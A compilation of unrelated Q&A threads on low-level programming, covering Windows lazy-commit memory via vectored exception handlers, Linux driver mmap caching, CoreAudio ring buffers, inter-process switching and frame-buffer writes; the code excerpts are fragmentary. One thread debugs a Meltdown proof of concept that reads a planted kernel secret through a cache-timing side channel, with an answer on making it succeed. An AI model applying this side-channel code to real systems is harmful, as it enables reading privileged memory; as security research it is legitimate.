I'm running a firmware simulation in a DLL which has simulated NAND (256MB or 1GB). I want to avoid allocating memory for this on the heap and instead allocate using virtual memory.
The memory initially needs to be cleared to 0xFF (like NAND is). However I don't want to pay for that initialization (nor commit un-accessed pages). So ideally it should only allocate upon access. And I do not need to retain the data following exit of the simulation.
Initial ideas are
VirtualAlloc. Not sure but thinking perhaps could use guard page and then trap the exception on first access. Not sure its ideal that a DLL handles such SEH exceptions? Or is there a better way?
Create a big file that's initialized to 0xFF. Then map view of file with copy-on-write.
Anyone know if it is possible to create a file with a callback for providing the initial data?
Think probably 1) the way to go but wondering if that's really the best option.
3) I've come up with another method that can avoid exception handler and also avoids creating a huge file:
Create a file that is same size as dwAllocationGranularity (64KiB typically). Fill with 0xFF. Then create multiple copy-on-write views of that in contiguous memory using MapViewOfFileEx + FILE_MAP_COPY (after an initial VirtualAlloc/VirtualFree to get a suitable base address that we can hope to allocate juxtapositioned views). Need to test this a bit more fully - slight concern about potential thread races.. I'm ony actually using a single thread but the CRT does start a few too.
This means that any code that only reads the virtual NAND also does not result in all pages getting committed.

yes, basically 1 is best solution. only i be do next changes - use VEH instead SEH - SEH handler will be called only if you access memory inside it, when in case VEH - access can be ai any context and thread. and instead use guard page, i be initial only reserve region of memory without real allocation. so any access to memory region lead to exception, you handle it in VEH - commit memory and fill with 0xFF pattern. demo code
PVOID g_NandBegin;
SIZE_T g_NandSize = 0x1000000;
::PEXCEPTION_RECORD ExceptionRecord = ExceptionInfo->ExceptionRecord;
if (ExceptionRecord->ExceptionCode == STATUS_ACCESS_VIOLATION &&
ExceptionRecord->NumberParameters > 1)
PVOID pv = (PVOID)ExceptionRecord->ExceptionInformation[1];
if ((ULONG_PTR)pv - (ULONG_PTR)g_NandBegin < g_NandSize)
SIZE_T RegionSize = 1;
if (0 <= NtAllocateVirtualMemory(NtCurrentProcess(), &pv, 0, &RegionSize, MEM_COMMIT, PAGE_READWRITE))
RtlFillMemoryUlong(pv, RegionSize, MAXULONG);
void dc()
if (PVOID pv = AddVectoredExceptionHandler(TRUE, Vex))
if (g_NandBegin = VirtualAlloc(0, g_NandSize, MEM_RESERVE, PAGE_READWRITE))
ULONG seed = ~GetTickCount();
int n = 0x100;
if (*(UCHAR*)((PBYTE)g_NandBegin + (((ULONG64)RtlRandomEx(&seed) * g_NandSize) >> 32)) != 0xFF)
} while (--n);
VirtualFree(g_NandBegin, 0, MEM_RELEASE);


MMAP buffer kernel writes are not seen by user space

i have a kernel driver which shares a buffer with the user space layer.
Everything seemed to work fine in my VM prototype (Ubuntu, Kernel 5.4) but when i moved my code to the target (same kernel but this is an embedded distro) I can clearly see that Kernel writes to the buffer (using memcpy, or memset) are not reflected in the User space side of the buffer.
Note that, i use direct buffer accesses on both sides. There is no concurrency issue, as the Kernel writes to, then the user space reads from.
I ended up believing this is a cache issue ... as the same code works perfectly in my VM.
The buffer size is 4 * PAGE_SIZE.
It is allocated as follows:
int _size = (SFP_BUFFER_SIZE + (PAGE_SIZE-1)) & ~(PAGE_SIZE-1);
input_buffer = (char*) kzalloc (_size, GFP_KERNEL); // aligned on page boundary
if (!input_buffer) {
dev_dbg(&dev, "open/ENOMEM (input_buffer)\n");
status = -ENOMEM;
goto err_all
When mmap'ing, i used the following code pattern:
vma->vm_ops = &fpgadrv_vm_ops;
vma->vm_page_prot = pgprot_noncached(vma->vm_page_prot);
pfn = virt_to_phys((void*)(input_buffer)) >> PAGE_SHIFT;
if (remap_pfn_range (vma, vma->vm_start, pfn, size, vma->vm_page_prot))
printk(KERN_DEBUG "remap page range failed\n");
return -EAGAIN;
User space code, and kernel code user memcpy to update the buffer. Note also that I cannot use write/read entry points, as they are already used for very specific operations.
The user code is calling mmap as follows:
buf = mmap(NULL, BUF_SIZE, PROT_READ | PROT_WRITE, MAP_SHARED, device_fd, 0);
if (buf == MAP_FAILED)
perror("USERDRV:cannot mmap");
return -1; // for testing, ignore the return code and continue
and upon IOCTL call, the kernel would fill up the mmap buffer as follows:
// reset the buffer (zero + put back the signature)
memset(input_buffer, 0xA5, SFP_BUFFER_SIZE);
memcpy((void*)(input_buffer), (void*)signature, 10);
Is there something more i should do to make sure the pages are not cached (assuming this is the cause of my pb) ?

Encouraging the CPU to perform out of order execution for a Meltdown test

I am attempting to exploit the meltdown security flaw on Ubuntu 16.04, with an unpatched kernel 4.8.0-36 on an Intel Core-i5 4300M CPU.
First, I am storing the secret data at an address in kernel space using a kernel module :
static __init int initialize_proc(void){
char* key_val = "abcd";
printk("Secret data address = %p\n", key_val);
printk("Value at %p = %s\n", key_val, key_val);
The printk statement gives me the address of the secret data.
Mar 30 07:00:49 VM kernel: [62055.121882] Secret data address = fa2ef024
Mar 30 07:00:49 VM kernel: [62055.121883] Value at fa2ef024 = abcd
I then attempt to access the data at this location and in the next instruction use it to cache an element of an array.
// Out of order execution
int meltdown(unsigned long kernel_addr){
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Execute out of order
I am expecting the CPU to go ahead and cache the array element at index (data*4096 +DELTA) when performing out of order execution. After this, a bounds check is performed and SIGSEGV is thrown.
I handle the SIGSEGV and then time the access to the array elements to determine which one has been cached:
void attackChannel_x86(){
register uint64_t time1, time2;
volatile uint8_t *addr;
int min = 10000;
int temp, i, k;
time1 = __rdtscp(&temp); //timestamp before memory access
temp = array[i*4096 + DELTA];
time2 = __rdtscp(&temp) - time1; // change in timestamp after the access
min = time2;
printf("array[%d*4096+DELTA]\n", k);
Since the value in data is ‘a’, I am expecting the result to be array[97*4096 + DELTA] since ASCII value of ‘a’ is 97.
However, this is not working and I am getting random outputs.
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
~/.../MyImpl$ ./OutofOrderExecution
Memory Access Violation
The possible reasons I could think of are:
The instruction caching the array element is not getting executed
out of order.
Out of order execution is occurring but the cache is being flushed.
I have misunderstood the mapping of memory in the kernel module and the address I'm using is incorrect
Since the system is vulnerable to meltdown, I am certain that rules out the 2nd possibility.
Hence, my question is: Why is out of order execution not working here? Are there any options/flags that “encourage” the CPU to execute out of order ?
Solutions I’ve already tried:
Using clock_gettime instead of rdtscp for timing memory access.
void attackChannel(){
int i, k, temp;
uint64_t diff;
volatile uint8_t *addr;
double min = 10000000;
struct timespec start, end;
addr = &array[i*4096 + DELTA];
clock_gettime(CLOCK_MONOTONIC, &start);
temp = *addr;
clock_gettime(CLOCK_MONOTONIC, &end);
diff = end.tv_nsec - start.tv_nsec;
min = diff;
printf("Accessed element : array[%d*4096+DELTA]\n", k);
Keeping the arithmetic units “busy” by executing a loop (see meltdown_busy_loop)
void meltdown_busy_loop(unsigned long kernel_addr){
char kernel_data;
asm volatile(
".rept 1000;"
"add $0x01, %%eax;"
kernel_data = *(char*)kernel_addr;
array[kernel_data*4096 + DELTA] +=10;
Using procfs to force the data into the cache before performing a time attack (see meltdown)
int meltdown(unsigned long kernel_addr){
// Cache the data to improve success
int fd = open("/proc/my_secret_key", O_RDONLY);
return -1;
int ret = pread(fd, NULL, 0, 0); //Data is cached
char data = *(char*) kernel_addr; //Raises exception
array[data*4096+DELTA] += 10; // <----- Out of order
For anyone interested in setting it up, here is the link to the github repo
For the sake of completeness, I am appending the main function and error handling code below:
void flushChannel(){
int i;
for(i=0;i<256;i++) array[i*4096 + DELTA] = 1;
for(i=0;i<256;i++) _mm_clflush(&array[i*4096 + DELTA]);
void catch_segv(){
siglongjmp(jbuf, 1);
int main(){
unsigned long kernel_addr = 0xfa2ef024;
signal(SIGSEGV, catch_segv);
if(sigsetjmp(jbuf, 1)==0)
// meltdown(kernel_addr);
printf("Memory Access Violation\n");
I think the data needs to be in L1d for Meltdown to work, and attempting to read it only through a TLB / page-table entry that doesn't have privileges won't bring it into L1d.
When any kind of bad outcome occurs (page fault, load from a non-speculative memory type, page accessed bit = 0), none of the processors initiate an off-core L2 request to fetch the data.
Unless there's something I'm missing, I think data is only vulnerable to Meltdown when something that is allowed to read it has brought it into L1d. (Directly or via HW prefetch.) I don't think repeated Meltdown attacks can bring data from RAM into L1d.
Try adding a system call or something to your module that uses READ_ONCE() on your secret data (or manually write *(volatile int*)&data; or just make it volatile so you can easily touch it) to bring it into cache from a context that does have privileges for that PTE.
Also: add $0x01, %%eax is a poor choice for delaying retirement. It's only 1 clock cycle of delay per uop, so OoO exec only has ~64 cycles from when the first instruction after the ADDs can enter the scheduler (RS) and run, before it chews through the adds and the faulting loads reach retirement.
At least use imul (3c latency), or better use xorps %xmm0,%xmm0 / repeated sqrtpd %xmm0,%xmm0 (single uop, 16 cycle latency on your Haswell.)

What's the correct method for CoreAudio realtime thread to communicate with UI thread?

I need to pass data between CoreAudio's realtime thread and the UI thread (one way, RT->UI). I know I can't use any Cocoa/Objective C methods like performSelectorOnMainThread or NSNotification and I can't use anything that will allocate memory as this will potentially block the RT thread.
What is the correct method for communicating between threads? Can I use GCD message queues or is there a more basic system to use?
Thinking about this a bit more, I suppose I could use a lock free ring buffer, which the RT thread puts a message into, and the UI thread checks for messages to pull out. Is this the best way and if so is there a system already to do this in CoreAudio or available elsewhere or do I need to code it up myself?
It turns out this was a lot simpler than I expected and the solution I came up with was just to use the Portaudio ring buffer. I needed to add pa_ringbuffer.[ch] and pa_memorybarrier.h to my project and then define a MessageData structure to store in the ring buffer.
typedef struct MessageData {
MessageType type;
union {
struct {
NSUInteger position;
} position;
} data;
} MessageData;
Then I allocated some space to store 32 messages and created the ring buffer.
_playbackData->RTToMainBuffer = malloc(sizeof(MessageData) * 32);
PaUtil_InitializeRingBuffer(&_playbackData->RTToMainRB, sizeof(MessageData),
32, _playbackData->RTToMainBuffer);
Finally I started an NSTimer for every 20ms to pull data from the ring buffer
while (PaUtil_GetRingBufferReadAvailable(&_playbackData->RTToMainRB)) {
MessageData *dataPtr1, *dataPtr2;
ring_buffer_size_t sizePtr1, sizePtr2;
// Should we read more than one at a time?
if (PaUtil_GetRingBufferReadRegions(&_playbackData->RTToMainRB, 1,
(void *)&dataPtr1, &sizePtr1,
(void *)&dataPtr2, &sizePtr2) != 1) {
// Parse message
switch (dataPtr1->type) {
case MessageTypeEOS:
case MessageTypePosition:
PaUtil_AdvanceRingBufferReadIndex(&_playbackData->RTToMainRB, 1);
Then in the realtime thread, pushing a message to the ringbuffer was simply
MessageData *dataPtr1, *dataPtr2;
ring_buffer_size_t sizePtr1, sizePtr2;
if (PaUtil_GetRingBufferWriteRegions(&data->RTToMainRB, 1,
(void *)&dataPtr1, &sizePtr1,
(void *)&dataPtr2, &sizePtr2)) {
dataPtr1->type = MessageTypePosition;
dataPtr1->data.position.position = currentPosition;
PaUtil_AdvanceRingBufferWriteIndex(&data->RTToMainRB, 1);
A ringbuffer is a good solution. Two if you need to communicate both ways ie. inbox/outbox message passing.
This is a good implementation for iOS/Mac if you don't want to use Portaudio.

How to make a fast context switch from one process to another?

I need to run unsafe native code on a sandbox process and I need to reduce bottleneck of process switch. Both processes (controller and sandbox) shares two auto-reset events and a coherent view of a mapped file (shared memory) that is used for communication.
To make this article smaller, I removed initializations from sample code, but the events are created by the controller, duplicated using DuplicateHandle, and then sent to sandbox process prior to work.
Controller source:
void inSandbox(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
int before = *shared;
for (int i = 0; i < 100000; ++i) {
// Notify sandbox of a new request and wait for answer.
SignalObjectAndWait(hNewRequest, hAnswer, INFINITE, FALSE);
assert(*shared == before + 100000);
void inProcess(volatile int *shared) {
int before = *shared;
for (int i = 0; i < 100000; ++i) {
assert(*shared == before + 100000);
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
Sandbox source:
void sandboxLoop(HANDLE hNewRequest, HANDLE hAnswer, volatile int *shared) {
// Wait for the first request from controller.
assert(WaitForSingleObject(hNewRequest, INFINITE) == WAIT_OBJECT_0);
for(;;) {
// Perform request.
// Notify controller and wait for next request.
SignalObjectAndWait(hAnswer, hNewRequest, INFINITE, FALSE);
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
inSandbox() - 550ms, ~350k context switches, 42% CPU (25% kernel, 17% user).
inProcess() - 20ms, ~2k context switches, 55% CPU (2% kernel, 53% user).
The machine is Windows 7 Pro, Core 2 Duo P9700 with 8gb of memory.
An interesting fact is that sandbox solution uses 42% of CPU vs 55% of in-process solution. Another noteworthy fact is that sandbox solution contains 350k context switches, which is much more than the 200k context switches that we can infer from source code.
I need to know if there's a way to reduce the overhead of transfer control to another process. I already tried to use pipes instead of events, and it was much worse. I also tried to use no event at all, by making the sandbox call SuspendThread(GetCurrentThread()) and making the controller call ResumeThread(hSandboxThread) on every request, but the performance was similar to using events.
If you have a solution that uses assembly (like performing a manual context switch) or Windows Driver Kit, please let me know as well. I don't mind having to install a driver to make this faster.
I heard that Google Native Client does something similar, but I only found this documentation. If you have more information, please let me know.
The first thing to try is raising the priority of the waiting thread. This should reduce the number of extraneous context switches.
Alternatively, since you're on a 2-core system, using spinlocks instead of events would make your code much much faster, at the cost of system performance and power consumption:
void inSandbox(volatile int *lock, volatile int *shared)
int i, before = *shared;
for (i = 0; i < 100000; ++i) {
*lock = 1;
while (*lock != 0) { }
assert(*shared == before + 100000);
void newRequest(volatile int *shared) {
// In this test, the request only increments an int.
void sandboxLoop(volatile int *lock, volatile int * shared)
for(;;) {
while (*lock != 1) { }
*lock = 0;
In this scenario, you should probably set thread affinity masks and/or lower the priority of the spinning thread so that it doesn't compete with the busy thread for CPU time.
Ideally, you'd use a hybrid approach. When one side is going to be busy for a while, let the other side wait on an event so that other processes can get some CPU time. You could trigger the event a little ahead of time (using the spinlock to retain synchronization) so that the other thread will be ready when you are.

How to directly write to the frame buffer in windows driver

I am writing the driver that can directly write data to the frame buffer, so that I can show the secret message on the screen while the applications in user space can't get it. Below is my code that trying to write the value to the frame buffer, but after I write the value to the frame buffer, the values i retrieved from the frame buffer are all 0.
I am puzzled, anyone knows the reason? Or anyone knows how to display a message on the screen while the applications in the user space can't get the content of the message? Thanks a lot!
#define BUFFER_SIZE 0x20000
void showMessage()
int i;
int *vAddr;
vAddr = (int *)MmMapIoSpace(pAddr, BUFFER_SIZE, MmNonCached);
KdPrint(("Virtual address is %p", vAddr));
for(i = 0; i < BUFFER_SIZE / 4; i++)
vAddr[i] = 0x11223344;
for(i = 0; i < 0x80; i++)
KdPrint(("Value: %d", vAddr[i])); // output are all zero
MmUnmapIoSpace(vAddr, BUFFER_SIZE);
You must map the shared memory during device start up. I assume that showMessage isn't called during the start up. See more here.
Regarding displaying message on the screen - it must involve user-space interaction since GUI is a user-space component. I suppose you could notify some GUI listener without other applications involvement.
Memory mapped IO isn't designed to act exactly like memory (retrieving data that is placed there in the same form it was stored). The writes into the 0xA0000+ range are writes into PORTS in the video device's IO space (from its perspective); So long as the appropriate writes result in the appropriate pixels lighting up, then the video device has done its job from the perspective of people that write drivers for screen rendering (or old DOS code where memory was a free-for-all without a user-space/kernel-space division). But such code never had a need to store data that would later be retrieved from the video segment. Therefore typical memory semantics would generally not have been implemented (waste of hardware and effort). Here, these randoms talk about it:
Magic number with MmMapIoSpace
